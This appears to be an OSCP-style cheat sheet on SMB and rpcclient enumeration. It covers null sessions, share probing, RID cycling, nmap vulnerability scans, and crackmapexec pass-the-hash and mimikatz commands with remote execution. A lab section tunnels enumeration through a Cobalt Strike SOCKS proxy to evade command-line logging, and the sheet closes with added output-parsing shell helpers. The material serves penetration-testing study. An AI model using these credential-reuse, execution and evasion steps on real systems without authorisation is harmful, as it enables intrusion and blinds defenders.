rpcclient enumeration oscp

A collection of commands and tools used for conducting enumeration during my OSCP journey. It contains contents from other blogs for my quick reference. This cheat sheet should not be considered to be complete and only represents a snapshot in time when I used these commands for performing enumeration during my OSCP journey. If I'm missing something, leave a comment. The notes are focused on Red Teamers, but Blue Teamers and Purple Teamers can also use these commands to test the security configurations they deployed. Sources drawn on include "PWK Notes: SMB Enumeration Checklist [Updated]" (Dec 2, 2018) and the lab "Enumerating Windows Domains with rpcclient through SocksProxy == Bypassing Command Line Logging".

SMB basics

SMB stands for Server Message Block; in modern language it is also known as the Common Internet File System (CIFS). It gives networked access to files, entire directories and other network resources such as printers. Two applications start a NetBIOS session when one (the client) sends a command to call another (the server) over NetBIOS. Ports to look for: 137, 138 and 139 (NetBIOS) and 445 (SMB directly over TCP). SMB2 arrived with Windows Vista SP1 and Windows Server 2008. A typical scan shows:

    139/tcp open netbios-ssn  Microsoft Windows netbios-ssn
    445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
    MAC Address: 00:50:56:XX:XX:XX (VMware)

The tool used for all of the enumeration and manipulation below is rpcclient. It speaks MSRPC, Microsoft's RPC implementation, which was originally derived from open source (DCE/RPC) and then developed further by Microsoft. RPC is a low-level inter-process communication mechanism: a client process calls a procedure that executes in another, possibly remote, server process and gets the result back. Microsoft's COM and DCOM are built on top of it, not the other way round. rpcclient itself was designed for debugging and troubleshooting a Samba configuration against Windows, which is exactly why it exposes so much of the SAMR, LSARPC, SRVSVC and spoolss interfaces to an attacker.

Null sessions

Windows NT, 2000 and XP (most SMB1 hosts): VULNERABLE, null sessions can be created by default. Windows 2003 and XP SP2 onwards: NOT VULNERABLE, null sessions can't be created by default. Test it with an empty user and an empty password:

    rpcclient -U '%' -N <IP>

It might ask for a password; just press Enter. If you get the `rpcclient $>` prompt, anonymous sessions work and there are some very useful commands within the tool (see the rpcclient section).

Finding hosts and the SMB version

    nmap -p 139,445 --open -oG smb.txt 192.168.1.0/24
    nmblookup -A 192.168.1.1
    nbtstat style output: WORKGROUP <00> - M, INet~Services <1c> - M, MAC Address = 00-50-56-XX-XX-XX

To look for possible exploits for the SMB version it is important to know which version is being used. Windows SMB is more complex than just a version, but looking at the connection in Wireshark will give a bunch of information. For Samba, rewardone in the PWK forums posted a neat script to easily get Samba versions; when in doubt, check the SMB version in a PCAP (an example result is `Unix Samba 2.2.3a`):

    #!/bin/bash
    # smbver.sh: sniff the Samba version string from the server's negotiate response
    if [ -z "$1" ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
    if [ ! -z "$2" ]; then rport=$2; else rport=139; fi
    # tap0 is the lab VPN interface; change it to the interface that faces the target
    tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
    # trigger a connection so the version string appears on the wire (this line is restored from the published script)
    echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
    echo "" && sleep .1

Versions worth noting:

    SAMBA 3.x-4.x   # vulnerable to linux/samba/is_known_pipename (CVE-2017-7494; the smb-vuln-cve-2017-7494 NSE script checks for it)
    SAMBA 3.5.11    # vulnerable to linux/samba/is_known_pipename

If smbclient fails with "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED", the server only speaks SMB1 and your client refuses it by default; allow NT1:

    smbclient -L //10.10.10.3/ --option='client min protocol=NT1'

Nmap NSE scripts

    nmap --script smb-enum-shares -p 139,445 $ip
    nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip
    nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip
    nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip
    nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip

`unsafe=1` permits checks that can crash the target (smb-vuln-ms08-067 is the classic), so on a production box prefer the last form, which excludes the brute and dos categories. Sample host script results:

    Host script results:
    | smb-vuln-ms06-025:
    |   VULNERABLE:
    |   ... and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to
    |   execute arbitrary code via certain crafted "RPC related requests" aka the "RRAS Memory Corruption Vulnerability."
    |   Risk factor: HIGH
    |   IDs: CVE:CVE-2006-2370
    |   References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2370
    |_smb-vuln-ms10-061: false
    | smb-enum-shares:
    |   \\[ip]\share:
    |     Comment: Default share
    |     Current user access: READ/WRITE

Shares

List shares with `smbclient -L //<IP>/` (null session: add `-N`). Example share names seen: `C$` (Disk, "Default share"), `IPC$` (remark "IPC Service (Mac OS X)" on a Mac), `NETLOGON` on a domain controller, and printer shares such as "PSC 2170 Series". Inside an smbclient session:

    mask    specifies the mask used to filter files within the directory (e.g. "" for all files)
    recurse toggles recursion on (default: off)
    prompt  toggles prompting for filenames off (default: on)
    mget    copies all files matching the mask from host to client machine

smbmap works well for listing shares and permissions and for downloading files; `smbmap -H [ip/hostname]` shows what you can do with the given credentials (or a null session if no credentials are given), and it can pull a whole share recursively (the original notes used it to download everything in the wwwroot share to /usr/share/smbmap).

Share listing over a null session often yields nothing interesting. It is therefore worth a shot to connect to likely share names manually and read the error, because the error leaks whether the share exists: NT_STATUS_ACCESS_DENIED means the share is there but your session may not open it, while NT_STATUS_BAD_NETWORK_NAME means there is no share by that name. Sometimes the connect simply succeeds and gives you a session. It may need to be run a second time for success.

crackmapexec

    crackmapexec smb -u 'guest' -p '' --shares $ip
    crackmapexec smb -u 'guest' -p '' --rid-brute 4000 $ip
    crackmapexec smb -u 'guest' -p '' --users $ip
    crackmapexec smb 192.168.1.0/24 -u Administrator -p <password>
    crackmapexec smb 192.168.1.0/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B
    crackmapexec smb 192.168.1.0/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -M mimikatz
    crackmapexec smb -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -x whoami $ip
    crackmapexec smb -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B --exec-method smbexec -x whoami $ip   # reliable pth code execution

`--rid-brute` automates the lookupsids RID cycling described under rpcclient. The enum4linux utility within Kali Linux is also particularly useful: it wraps the user, group, share and policy enumeration into one run (its output starts with lines such as "[+] Finding open SMB ports" and "[+] User SMB session established on [ip]"). For password guessing against SMB the notes used Hydra (http://www.thc.org), at the time Hydra v5.1 (c) 2005 by van Hauser / THC, "use allowed only for legal purposes".

rpcclient

Running rpcclient with no options prints the usage text. The options referenced in these notes:

    --usage                              Display brief usage message
    -V, --version                        Print version
    -c, --command=COMMANDS               Execute semicolon separated cmds
    -I, --dest-ip=IP                     Specify destination IP address
    -i, --scope=SCOPE                    Use this Netbios scope
    -O, --socket-options=SOCKETOPTIONS   socket options to use
    -W, --workgroup=WORKGROUP            Set the workgroup name
    -P, --machine-pass                   Use stored machine account password

Start a session and run commands interactively, or non-interactively with `-c`:

    rpcclient -U '%' -N <IP>
    rpcclient -U 'user%password' <IP>
    rpcclient -U '%' -N <IP> -c "srvinfo;enumdomusers;querydominfo;getdompwinfo;netshareenum"

Server and domain:

    help              Get help on commands
    srvinfo           Server query info (OS version, e.g. "os version : 4.9", server type); usually the first command to run
    netremotetod      Fetch remote time of day
    enumdomains       Enumerate all domains; useful where several domains may be deployed in the network
    querydominfo      Domain info (counts of users and groups, forced logoff setting and more)
    dsroledominfo     Primary domain information such as the role of the machine and the native mode of the domain
    getdompwinfo      Password properties/policy of the domain
    lsaquery          LSA policy for the domain
    netshareenum      Enumerate shares
    netshareenumall   Enumerate all shares, including hidden/admin ones

Users and groups:

    enumdomusers      Enumerate domain users (one "user:[name] rid:[0x...]" per line)
    querydispinfo     Extends the user list with full names and descriptions
    queryuser <RID>   Details of one user
    queryusergroups   Query user groups
    enumdomgroups     Enumerate domain groups
    enumalsgroups     Enumerate alias groups (builtin or domain)
    samlookuprids     Look up names for RIDs
    samdeltas         Query Sam Deltas

SIDs, RID cycling and privileges. lookupnames turns a name into a SID, lookupsids does the reverse and returns the account name and type for the RID the SID belongs to:

    rpcclient $> lookupnames lewis
    lewis S-1-5-21-1835020781-2383529660-3657267081-2002 (User: 1)
    rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2002
    S-1-5-21-1835020781-2383529660-3657267081-2002 LEWISFAMILY\user (1)
    rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-501
    S-1-5-21-1835020781-2383529660-3657267081-501 LEWISFAMILY\unknown (1)
    rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1007
    S-1-5-21-1835020781-2383529660-3657267081-1007 LEWISFAMILY\sys (2)
    rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1013
    S-1-5-21-1835020781-2383529660-3657267081-1013 LEWISFAMILY\mail (2)
    rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1008
    result was NT_STATUS_NONE_MAPPED

Once the domain SID is known, walking the RID suffix (500, 501, 1000, 1001, ...) with lookupsids lists accounts even when enumdomusers is denied; the number in parentheses is the SID type (1 = user, 2 = group) and NT_STATUS_NONE_MAPPED just means that RID is unused.

    lsaenumsid                 Enumerate the LSA SIDs; in the demonstration the enumerated SID belonged to the Administrator of the Builtin users
    enumprivs                  Privileges available on the server (35 in the demonstration)
    lsalookupprivvalue         Get a privilege value given its name
    lsaaddacctrights           Add rights to an account
    lsaaddpriv / lsadelpriv    Add or remove a privilege on a SID; the demonstration added SeCreateTokenPrivilege to a group's SID and removed it again

Privileges can be enumerated and, with enough rights, added or removed for a group or a user by SID. The manipulation of groups is likewise not limited to creating one: after creating a group, enumdomgroups shows the newly created group.

Printer, DFS and service commands that rpcclient also exposes (mostly for completeness, they need rights on the target):

    enumdata          Enumerate printer data
    openprinter       Open printer handle
    getdriver         Get print driver information
    adddriver         Add a print driver
    addprinter        Add a printer
    setprintername    Set printername
    deleteform        Delete form
    dfsremove         Remove a DFS share
    logonctrl2        Logon Control 2
    shutdownabort     Abort Shutdown (over shutdown pipe)

Enumerating Windows domains with rpcclient through a SOCKS proxy (bypassing command line logging)

This is an approach I came up with while researching on offensive security. This lab shows how it is possible to bypass command line argument logging when enumerating Windows environments, using Cobalt Strike and its SOCKS proxy (or any other post-exploitation tool that supports SOCKS proxying). First, two Cobalt Strike sessions are established. Second, the attacker opens a SOCKS4 proxy on port 7777 on his local Kali machine (10.0.0.5). Then, as attacker@kali, use `proxychains <command>` to push the rpcclient, smbclient or nmap traffic through the beacon, for example `proxychains rpcclient -U 'user%pass' <DC-IP>`. After the tunnel is up, you can comment out the first socks entry in the proxychains config. Moving on, in the same way they can query info about specific AD users (queryuser), enumerate the current user's privileges (enumprivs) and many more (consult rpcclient for all available commands). Finally, of course, they can run nmap if needed, and Impacket provides even more tools to enumerate remote systems through compromised boxes. The point is that the domain is enumerated over MSRPC from the attacker's box, without the likes of net user /domain and similar commands executing on the compromised host, which most likely are monitored by the blue team.
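The share-probing trick and the lookupsids RID walk above are easier to use when the output is machine-readable. The following helpers are an added example written for these notes, not code from any of the blogs they collect from: one function turns an smbclient probe into a verdict that distinguishes "share exists but access denied" from "no such share", two functions parse enumdomusers and lookupsids output, and one generates the lookupsids command list for a RID range. The host, share and account strings in the sample data are constructed; only the NT_STATUS names and the rpcclient line formats are real.

```shell
#!/bin/sh
# Added example for the cheat sheet above; POSIX sh, no dependencies beyond sed/awk.

# --- manual share probing ---------------------------------------------------
# Reads one smbclient run's combined stdout+stderr on stdin and prints a verdict.
classify_share_probe() {
  out=$(cat)
  case "$out" in
    *NT_STATUS_ACCESS_DENIED*)    echo exists-denied ;;   # share is real, no rights for this session
    *NT_STATUS_BAD_NETWORK_NAME*) echo no-such-share ;;   # name is not a share on the server
    *NT_STATUS_LOGON_FAILURE*)    echo logon-failure ;;   # the (null) session itself was refused
    *"blocks of size"*)           echo accessible   ;;   # a directory listing came back
    *)                            echo unknown      ;;
  esac
}

# Live use (not exercised here): probe_shares 10.10.10.3 C$ ADMIN$ IPC$ wwwroot
probe_shares() {
  target=$1; shift
  for share in "$@"; do
    verdict=$(smbclient -N "//$target/$share" -c ls 2>&1 | classify_share_probe)
    printf '%-16s %s\n' "$share" "$verdict"
  done
}

# --- rpcclient output -------------------------------------------------------
# enumdomusers prints "user:[name] rid:[0x3e8]"; emit "1000 name" with a decimal RID.
parse_enumdomusers() {
  sed -n 's/^user:\[\([^]]*\)\] rid:\[0x\([0-9a-fA-F]*\)\].*/\2 \1/p' |
  while read -r hexrid name; do
    printf '%d %s\n' "$((0x$hexrid))" "$name"
  done
}

# SID_NAME_USE values, i.e. the number lookupsids prints in parentheses.
sid_type_name() {
  case "$1" in
    1) echo User ;;  2) echo Group ;;  3) echo Domain ;;  4) echo Alias ;;
    5) echo WellKnownGroup ;;  6) echo DeletedAccount ;;  7) echo Invalid ;;
    8) echo Unknown ;;  *) echo "Type$1" ;;
  esac
}

# lookupsids prints "S-1-5-21-...-1007 DOMAIN\name (2)" and, for unused RIDs,
# "*unknown*\*unknown* (8)". Emit "rid DOMAIN\name TypeName", dropping unmapped
# entries; names may contain spaces (e.g. Domain Admins), so the type is read first.
parse_lookupsids() {
  awk '/^S-[0-9-]+ .* \([0-9]+\)$/ {
         n = split($1, a, "-"); rid = a[n]
         type = $NF; gsub(/[()]/, "", type)
         name = $0; sub(/^[^ ]+ /, "", name); sub(/ \([0-9]+\)$/, "", name)
         if (type != 8) print rid, type, name
       }' |
  while read -r rid type name; do
    printf '%s %s %s\n' "$rid" "$name" "$(sid_type_name "$type")"
  done
}

# Print "lookupsids <domain SID>-<rid>" for every RID in [start, end]. Joined with
# ';' this becomes a single rpcclient -c argument, so one connection walks the range.
rid_cycle_cmds() {
  dom=$1; i=$2; end=$3
  while [ "$i" -le "$end" ]; do
    printf 'lookupsids %s-%s\n' "$dom" "$i"
    i=$((i + 1))
  done
}

# Constructed sample data (same layout as real output, values made up).
SAMPLE_LISTING='  .                                   D        0  Mon Jan  1 00:00:00 2018
  ..                                  D        0  Mon Jan  1 00:00:00 2018

                10485760 blocks of size 1024. 5242880 blocks available'
SAMPLE_LOOKUPSIDS='S-1-5-21-1835020781-2383529660-3657267081-501 LEWISFAMILY\unknown (1)
S-1-5-21-1835020781-2383529660-3657267081-1007 LEWISFAMILY\sys (2)
S-1-5-21-1835020781-2383529660-3657267081-1008 *unknown*\*unknown* (8)
S-1-5-21-1835020781-2383529660-3657267081-2002 LEWISFAMILY\user (1)'

if [ "${1:-}" = "--demo" ]; then
  printf '%s\n' "$SAMPLE_LOOKUPSIDS" | parse_lookupsids
  rid_cycle_cmds S-1-5-21-1835020781-2383529660-3657267081 500 503
fi
```

Against a live target the same functions consume real output, for example `rpcclient -U '%' -N 10.10.10.3 -c enumdomusers | parse_enumdomusers`, or `rpcclient -U '%' -N 10.10.10.3 -c "$(rid_cycle_cmds S-1-5-21-1835020781-2383529660-3657267081 500 1100 | paste -s -d ';' -)" | parse_lookupsids` to walk RIDs 500 to 1100 over one connection. Type 8 entries are dropped because on most servers an unused RID returns the `*unknown*` mapping rather than NT_STATUS_NONE_MAPPED, and a verdict of exists-denied is itself a finding: the share name is confirmed without any credentials.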
